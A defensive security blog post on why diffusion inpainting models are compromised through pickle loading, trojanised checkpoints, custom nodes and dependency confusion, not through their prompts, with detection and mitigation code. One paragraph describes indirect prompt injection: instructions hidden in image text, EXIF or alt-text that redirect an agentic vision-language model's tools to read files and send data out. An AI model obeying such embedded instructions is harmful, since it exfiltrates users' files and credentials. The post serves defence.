RC RANDOM CHAOS

torch.load runs attacker code before the first denoising step

A diffusion inpainting model can't execute a prompt. The real RCE is pickle deserialisation in the loader, custom nodes, and the agent around it.


“Moebius 02b” is a diffusion inpainting model. The “10B-level performance” claim describes output quality at a fraction of the parameter count. Neither figure has anything to do with prompt injection, code execution, or data exfiltration. A denoising network does not parse instructions. It maps a conditioning vector and Gaussian noise to pixels across a fixed number of sampling steps. There is no interpreter, no eval, no command dispatch in the loop. A prompt that reaches the UNet changes the image. It does not change control flow. Conflating generation quality with a code-execution primitive is a category error, and it sends defenders to the wrong layer.

The compromise vector for an image model is not the text reaching the cross-attention blocks. It is the pipeline that deserialises the weights and the orchestrator that calls the model as a tool. That is where arbitrary code runs. That is where credentials sit. The denoiser is the one part of this system that cannot be made to execute a command.

Start with how a checkpoint loads. PyTorch .ckpt, .pt, and .bin files are Python pickle streams. torch.load hands them to the pickle unpickler. Pickle is a stack-based virtual machine with opcodes, and it is not a data format - it is a program. The REDUCE opcode invokes a callable with attacker-chosen arguments. A crafted object’s __reduce__ method returns (os.system, ("command",)). The unpickler executes it during deserialisation - before the first denoising step, before the weights are resident on the GPU. PyTorch 2.6 changed the torch.load default to weights_only=True, which restricts the unpickler to an allowlist of types; older versions, and any call that passes weights_only=False, run the full unpickler. This is CWE-502, deserialisation of untrusted data. It is the most reliable code-execution primitive in the machine-learning supply chain.
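The mechanism can be shown with a harmless callable. The sketch below is illustrative only: Marker is a hypothetical class, and operator.add stands in for the dangerous callable a real payload would name. It shows that loading returns the callable's result, not the object, and that the stream carries a REDUCE opcode.

```python
import operator
import pickle
import pickletools


class Marker:
    """Hypothetical stand-in for a crafted object inside a checkpoint."""

    def __reduce__(self):
        # Tells pickle: "to rebuild me, call operator.add(40, 2)".
        # A real payload would name a dangerous callable here instead.
        return (operator.add, (40, 2))


blob = pickle.dumps(Marker())

# Loading never constructs a Marker. It calls the named callable
# and hands back whatever that callable returned.
result = pickle.loads(blob)

# The opcode stream contains REDUCE, the instruction that made the call.
opcode_names = [op.name for op, _arg, _pos in pickletools.genops(blob)]

print(type(result).__name__, result)   # int 42
print("REDUCE" in opcode_names)        # True
```

The call happens inside pickle.loads. No method on the loaded object has to be touched afterwards, which is why the payload fires before any model code runs.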

The opcodes make scanning hard. GLOBAL and STACK_GLOBAL import an arbitrary module attribute by name, so the malicious callable need never appear as a literal string. Static scanners - picklescan, fickling - match known-bad imports and opcode patterns, and crafted streams evade them with indirection through builtins or codecs. A scanner that passes a checkpoint is not a proof of safety. It is the absence of a signature match.
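A naive import lister makes the limitation concrete. This is a minimal sketch using the standard pickletools module, not how picklescan or fickling are implemented; list_imports and its string-tracking heuristic are assumptions made for illustration.

```python
import pickle
import pickletools

# Opcodes that push a text string onto the pickle VM stack.
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def list_imports(blob: bytes) -> list[tuple[str, str]]:
    """Return (module, name) pairs a pickle stream appears to import."""
    imports = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(blob):
        if opcode.name in STRING_OPS:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # pickletools reports the argument as "module name".
            module, _, name = arg.partition(" ")
            imports.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Heuristic: assume the two most recent string pushes are the
            # module and attribute. Strings fetched from the memo, or
            # built at load time, are invisible to this check.
            imports.append((recent_strings[-2], recent_strings[-1]))
    return imports


print(list_imports(pickle.dumps(len, protocol=4)))  # [('builtins', 'len')]
```

The heuristic in the STACK_GLOBAL branch is exactly where indirection wins. The scanner reports what it can see statically; the unpickler resolves whatever is on the stack at run time.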

The same class lives in higher-level loaders. CVE-2024-3660, CVSS 9.8, is arbitrary code execution in Keras through Lambda layers. A Lambda layer serialises Python via the marshal module. load_model deserialises and runs it. A trojanised model in legacy H5 or SavedModel format executes on load with the privileges of the loading process. Keras 2.13 set safe_mode=True by default. JFrog then demonstrated a safe_mode bypass - the mitigation is necessary, not sufficient, and the version that fixes the bypass is the one that counts.

The serving layer carries it too. CVE-2024-50050 in Meta’s llama-stack is deserialisation of untrusted data through pyzmq’s recv_pyobj, which unpickles whatever arrives on the socket. It is reachable across the network against an exposed inference socket - MITRE T1190, exploitation of a public-facing application, with no authentication in the path. Snyk scored it 9.3 under CVSS 4.0 and 9.8 under CVSS 3.1. Meta scored it 6.3. The dispute is about reachability, not mechanism. The mechanism is pickle. Meta replaced it with a type-safe Pydantic JSON implementation in 0.0.41. The pattern repeats across the stack because pickle is the default serialiser and convenience won every design review.
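The shape of that fix can be sketched with the standard library alone. This is a stand-in for the idea, not Meta's code and not Pydantic: InferenceRequest, its fields, and the step bounds are hypothetical. The point is that JSON yields only dicts, lists, strings, and numbers, and the decoder accepts only the schema it expects.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class InferenceRequest:
    """Hypothetical request schema for an inpainting endpoint."""
    prompt: str
    steps: int


def decode_request(raw: bytes) -> InferenceRequest:
    """Parse bytes from the wire into a typed request, or raise ValueError."""
    data = json.loads(raw)  # produces plain data only; never calls a callable
    if not isinstance(data, dict) or set(data) != {"prompt", "steps"}:
        raise ValueError("unexpected fields in request")
    prompt, steps = data["prompt"], data["steps"]
    if not isinstance(prompt, str):
        raise ValueError("prompt must be a string")
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(steps, bool) or not isinstance(steps, int):
        raise ValueError("steps must be an integer")
    if not 1 <= steps <= 200:  # assumed bounds for this sketch
        raise ValueError("steps out of range")
    return InferenceRequest(prompt=prompt, steps=steps)


request = decode_request(b'{"prompt": "fill the sky", "steps": 30}')
print(request)
```

A pickle stream sent to this decoder fails to parse and raises ValueError. Nothing in the input can name a function to call.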

The exploit path for an image model has three entry points. None require touching the diffusion math.

First, the weight file. An attacker publishes a model - a base checkpoint, a fine-tune, a LoRA - on a public hub. Naming it after a model with reputation, “Moebius 02b,” is the social-engineering layer. The victim pulls it and loads it with torch.load or a framework load_model. The __reduce__ payload fires at deserialisation. Code runs in the serving process. That process holds what matters: object-store tokens for the weights bucket, the inference API key, GPU host credentials, environment variables carrying database strings. Exfiltration is one outbound request. This maps to MITRE T1195.002, compromise of the software supply chain, then T1059.006 for Python execution and T1552.001 for credentials in files and environment.

Second, the extension. ComfyUI and comparable inpainting front-ends load custom nodes - arbitrary Python executed in the server process at startup. The trust model is install-and-run. The Ultralytics compromise of December 2024 sat directly in this tree. Versions 8.3.41 and 8.3.42 shipped an XMRig Monero miner, pushed through a GitHub Actions script injection - a pull_request_target workflow that evaluated an attacker-controlled branch name. ComfyUI-Impact-Pack depends on Ultralytics. The clean releases were 8.3.43 and 8.3.44. The payload was reintroduced in 8.3.45 and 8.3.46. A version range protected no one. Only an exact pinned hash did.
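Pinning a hash means refusing any artifact whose digest differs from one recorded in advance. A minimal sketch of that check for a downloaded file follows; verify_artifact and the idea of a separately stored pinned digest are assumptions for illustration, and for Python packages pip's hash-checking mode plays the same role.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large artifacts fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path: Path, pinned_hex: str) -> None:
    """Raise ValueError unless the file matches the pinned digest."""
    actual = sha256_of(path)
    if not hmac.compare_digest(actual, pinned_hex.lower()):
        raise ValueError(f"{path.name}: digest mismatch, refusing to load")
```

The check has to run before the loader opens the file, and the pinned digest has to come from somewhere the publisher of the artifact cannot rewrite.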

Third, dependency confusion. PyTorch-nightly pulled a malicious torchtriton from PyPI between 25 and 30 December 2022, because pip resolved the public index ahead of the private one. The package gathered system information and files and exfiltrated them over encrypted DNS to *.h4ck.cfd, with anti-VM checks and the payload contained in an ELF binary. Same outcome - code in the build or serving context, credentials and files out the door. The legitimate package was renamed pytorch-triton to break the name collision.

Where prompt injection genuinely applies is one layer up, and it is not the denoiser. When an image model sits behind an agentic multimodal system, the orchestrating language model is the target. Instructions embedded in an image - rendered text, EXIF fields, alt-text - get read by a vision-language model that holds tools. That is indirect prompt injection, OWASP LLM01. The injected text redirects the agent’s tool calls: read a file, request an internal URL, return context to an attacker endpoint. The diffusion model is incidental. The exfiltration runs through the agent’s HTTP and filesystem tools, never through a pixel the inpainting network produced. The cross-attention layers see the conditioning embedding and nothing else. Calling this a flaw “in the generation process” misattributes it. The generation process is downstream of the component under attack.

No public CVE pins “Moebius 02b” to in-the-wild exploitation. Treat the name as a release, not a known-compromised artifact. The campaigns that are documented are the supply-chain ones - torchtriton, Ultralytics, and the trojanised models that JFrog and HiddenLayer catalogued on Hugging Face, more than a hundred carrying pickle payloads. The actors are opportunistic. The tooling is XMRig and commodity stealers. The entry point is the load step, never the sampling loop. The common thread is a loader that treats a downloaded artifact as data when it is code, and a publisher namespace that anyone can populate with a familiar name.

In telemetry the pickle-on-load path is loud when the payload spawns a child. Sysmon Event ID 1 shows a process-create with python as parent and sh, bash, curl, or a miner binary as child. Sysmon Event ID 3 shows the inference worker opening a network connection to a destination that is neither a package registry nor a model bucket. Sysmon Event ID 22 catches the torchtriton style - DNS queries to high-entropy subdomains, long encoded labels, an uncommon TLD. EDR flags the unexpected child of a model-server process and the parent-child lineage python to shell. Those detections fire when the payload does something coarse.
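The DNS signal can be approximated with a length and entropy check on query labels. This is a rough sketch, not a production detector: the thresholds are assumptions that need tuning against real traffic, and treating the last two labels as the registered domain is a simplification.

```python
import math
from collections import Counter


def shannon_entropy(label: str) -> float:
    """Bits of entropy per character in a DNS label."""
    total = len(label)
    counts = Counter(label)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_dns_exfil(qname: str, min_len: int = 30,
                         min_entropy: float = 3.5) -> bool:
    """Flag queries with a long, high-entropy subdomain label.

    Both thresholds are assumed values for this sketch.
    """
    labels = qname.rstrip(".").split(".")
    # Naive split: everything left of the last two labels is a subdomain.
    subdomains = labels[:-2]
    return any(
        len(label) >= min_len and shannon_entropy(label) >= min_entropy
        for label in subdomains
    )


print(looks_like_dns_exfil("files.pythonhosted.org"))
print(looks_like_dns_exfil("a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8.example.test"))
```

Fed from Sysmon Event ID 22 records, a filter like this narrows the queries worth a human look. It will also flag some CDN and telemetry hostnames, so it is a triage aid, not a verdict.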

The gap is the quiet payload. Code that runs in-process, opens one HTTPS connection to a host resembling legitimate object storage, ships a token, and returns control leaves almost nothing behind. Loading a model is expected to read multi-gigabyte files, saturate the GPU, and reach the network for weights. Malicious behaviour hides inside that baseline. The indirect prompt-injection path is worse for the defender - host EDR sees nothing, because nothing exec’s. The only evidence lives in application logs: the orchestrator’s tool-invocation trace, egress to an unexpected URL, model output containing data that was never in the prompt. That is a SIEM correlation problem on agent egress, not an endpoint-detection problem, and most pipelines do not log tool calls at all.
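The correlation presupposes a tool-invocation log. Assuming the orchestrator emits one record per tool call with a url field (a hypothetical format; the host names below are placeholders), the egress check reduces to an allowlist comparison:

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the agent is expected to reach.
ALLOWED_HOSTS = {"models.example.com", "api.internal.example"}


def unexpected_egress(tool_calls, allowed=ALLOWED_HOSTS):
    """Return tool-call records whose URL host is not on the allowlist."""
    flagged = []
    for call in tool_calls:
        url = call.get("url")
        if not url:
            continue  # tool call with no network target
        host = urlsplit(url).hostname  # lowercased by urlsplit; None if absent
        if host is None or host not in allowed:
            flagged.append(call)
    return flagged


trace = [
    {"tool": "http_get", "url": "https://models.example.com/weights/index.json"},
    {"tool": "read_file", "path": "/srv/app/config.yaml"},
    {"tool": "http_get", "url": "https://collector.attacker.test/?d=c2VjcmV0"},
]
for call in unexpected_egress(trace):
    print(call["tool"], call["url"])
```

The sketch only works if the trace exists. A pipeline that does not record tool calls has nothing to compare against.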

The patch boundaries are specific. llama-stack at or above 0.0.41 removes the pyzmq pickle path. Keras at or above 2.13 sets safe_mode=True, with the caveat that a bypass was published - the safe version is the one that postdates the bypass fix, not 2.13 itself. Ultralytics 8.3.43 and 8.3.44 are clean; 8.3.45 and 8.3.46 are not, which is the case for pinning a hash and not a range. The structural fix for weights is format. safetensors stores tensors as a flat buffer with a JSON header and no executable opcodes, which removes the deserialisation primitive for the model file. It does nothing for custom nodes, the serving framework, or the agent. Signed weights through Sigstore or an equivalent attestation close the publisher-trust gap that naming alone exploits.
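The safetensors layout is simple enough to read by hand: an 8-byte little-endian header length, a JSON header, then raw tensor bytes. The sketch below parses only the header with the standard library. It is not the safetensors library's implementation, and the size cap is an assumed value.

```python
import json
import struct

MAX_HEADER_BYTES = 100 * 1024 * 1024  # assumed sanity cap for this sketch


def read_safetensors_header(data: bytes) -> dict:
    """Parse the JSON header of a safetensors buffer without touching tensors."""
    if len(data) < 8:
        raise ValueError("too short to contain a header length")
    (header_len,) = struct.unpack("<Q", data[:8])
    if header_len > MAX_HEADER_BYTES or 8 + header_len > len(data):
        raise ValueError("implausible header length")
    header = json.loads(data[8:8 + header_len])
    if not isinstance(header, dict):
        raise ValueError("header is not a JSON object")
    return header


# Build a tiny file in memory: one float32 tensor named "w" with two values.
meta = {"w": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}
header_bytes = json.dumps(meta).encode("utf-8")
tensor_bytes = struct.pack("<2f", 1.0, 2.0)
blob = struct.pack("<Q", len(header_bytes)) + header_bytes + tensor_bytes

header = read_safetensors_header(blob)
print(header["w"]["dtype"], header["w"]["shape"])
```

Every step is a length check, a JSON parse, or a byte slice. There is no opcode that names a callable, which is the property the format exists to provide.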

The residual exposure after all of it: the parameter count of an inpainting model is not a security property. A 0.2B model and a 10B model load through the same pickle path and run the same custom nodes under the same process credentials. Prompt injection against the denoiser is not a code-execution primitive and never was. The execution lives in the loader and the orchestrator. Defence belongs there - hash and signature verification on every weight and dependency, safetensors for storage, a non-pickle serialiser at the serving boundary, least-privilege credentials on the inference process, and egress monitoring on the agent. The model generates pixels. The pipeline around it is what gets owned.
